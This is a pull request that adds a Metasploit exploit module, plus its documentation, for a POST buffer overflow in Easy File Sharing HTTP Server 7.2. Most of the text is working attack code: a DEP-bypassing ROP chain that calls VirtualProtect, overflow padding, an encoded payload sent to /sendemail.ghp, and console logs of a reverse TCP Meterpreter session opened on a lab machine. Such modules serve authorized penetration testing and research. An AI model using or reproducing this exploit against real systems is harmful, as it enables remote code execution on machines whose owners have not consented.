### PR TITLE
Easy File Sharing HTTP Server 7.2 - Post Overflow exploit

### DIFF
--- a/modules/exploits/windows/http/easyfilesharing_post.md
+++ b/modules/exploits/windows/http/easyfilesharing_post.md
@@ -1,0 +1,53 @@
+## Description
+
+This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain.
+
+This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application
+
+## Vulnerable Application
+
+[Easy File Sharing](http://www.sharing-file.com/) is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE, Firefox, Chrome etc.).
+
+This module has been tested successfully on
+
+* Easy File Sharing 7.2 on Windows XP En Sp3
+
+Installers:
+
+[Easy File Sharing Installers](http://www.sharing-file.com/efssetup.exe)
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use exploits/windows/http/easyfilesharing_post`
+3. Do: `set rhosts [IP]`
+4. Do: `exploit`
+5. You should get your payload executed
+
+## Scenarios
+
+```
+root@kali:~$ msfconsole -q
+msf > use exploit/windows/http/easyfilesharing_post
+msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
+RHOST => 192.168.56.101
+msf exploit(easyfilesharing_post) > exploit
+ 
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Sending stage (957487 bytes) to 192.168.56.101
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200
+ 
+meterpreter > sysinfo
+Computer    	: MM
+OS          	: Windows XP (Build 2600, Service Pack 3).
+Architecture	: x86
+System Language : en_US
+Domain      	: WORKGROUP
+Logged On Users : 2
+Meterpreter 	: x86/windows
+meterpreter > exit
+[*] Shutting down Meterpreter...
+ 
+[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
+msf exploit(easyfilesharing_post) >
+```

--- a/modules/exploits/windows/http/easyfilesharing_post.rb
+++ b/modules/exploits/windows/http/easyfilesharing_post.rb
@@ -16,11 +16,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'    => %q{
         This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.
       },
-      'Author'         => 
+      'Author'         =>
         [
           'bl4ck h4ck3r', #POC
           'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' #Metasploit
-	],
+        ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
@@ -57,7 +57,6 @@ class MetasploitModule < Msf::Exploit::Remote
         0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
         0x10015442,  # POP EAX # RETN [ImageLoad.dll]
         0x1004de84,  # &Writable location [ImageLoad.dll]
- 
         0x10015442,  # POP EAX # RETN [ImageLoad.dll]
         0x61c832d0,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
         0x1002248c,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]

--- a/modules/exploits/windows/http/easyfilesharing_post.rb
+++ b/modules/exploits/windows/http/easyfilesharing_post.rb
@@ -1,0 +1,160 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  #include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Easy File Sharing HTTP Server 7.2 POST Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.
+      },
+      'Author'         => 
+        [
+          'bl4ck h4ck3r', #POC
+          'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' #Metasploit
+	],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '42186' ],
+        ],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x1002280a } ],
+        ],
+      'DefaultOptions' => {
+          'RPORT' => 80,
+          'EXITFUNC' => 'thread',
+          'ENCODER' => 'x86/alpha_mixed'
+        },
+      'DisclosureDate' => 'Jun 12 2017',
+      'DefaultTarget'  => 0))
+  end
+
+  def create_rop_chain
+    # rop chain generated with mona.py - www.corelan.be
+    rop_gadgets = [
+        # 0x00000000,  # [-] Unable to find gadget to put 00000201 into ebx
+        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
+        0xFFFFFDFE,  # -202
+        0x100231d1,  # NEG EAX # RETN [ImageLoad.dll]
+        0x1001da09,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]|   {PAGE_EXECUTE_READ}
+        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
+        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
+        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
+        0x1004de84,  # &Writable location [ImageLoad.dll]
+ 
+        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
+        0x61c832d0,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
+        0x1002248c,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
+        0x61c0a798,  # XCHG EAX,EDI # RETN [sqlite3.dll]
+        0x1001d626,  # XOR ESI,ESI # RETN [ImageLoad.dll]
+        0x10021a3e,  # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
+        0x100218f9,  # POP EBP # RETN [ImageLoad.dll]
+        0x61c24169,  # & push esp # ret  [sqlite3.dll]
+        0x10022c4c,  # XOR EDX,EDX # RETN [ImageLoad.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+        0x1001bd98,  # POP ECX # RETN [ImageLoad.dll]
+        0x1004de84,  # &Writable location [ImageLoad.dll]
+        0x61c373a4,  # POP EDI # RETN [sqlite3.dll]
+        0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
+        0x10015442,  # POP EAX # RETN [ImageLoad.dll]
+        0x90909090,  # nop
+        0x100240c2,  # PUSHAD # RETN [ImageLoad.dll]
+    ].flatten.pack('V*')
+    return rop_gadgets
+  end
+
+  def exploit
+    sploit = rand_text_alpha_upper(2278)
+    rop_chain = create_rop_chain
+    sploit << rop_chain
+    sploit << "\x90" * 200
+    sploit << payload.encoded
+    sploit << rand_text_alpha_upper(1794 - 200 - payload.encoded.length - rop_chain.length)
+    sploit << [target.ret].pack('V')
+
+    request = "POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=#{sploit}&getPassword=Get+Password"
+    connect
+    sock.put(request)
+    handler
+    disconnect
+  end
+end


### PR DESCRIPTION
This module exploits a post buffer overflow vulnerability of Easy File Sharing HTTP Server 7.2

## Verification

Tested on: Windows XP Sp3 English
Vulnerable application: http://www.sharing-file.com/efssetup.exe

Example output:

```bash
marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easyfilesharing_post
msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easyfilesharing_post) > exploit
 
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200
 
meterpreter > sysinfo
Computer    	: MM-8B040C5B05D9
OS          	: Windows XP (Build 2600, Service Pack 3).
Architecture	: x86
System Language : en_US
Domain      	: WORKGROUP
Logged On Users : 2
Meterpreter 	: x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
 
[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(easyfilesharing_post) >
```
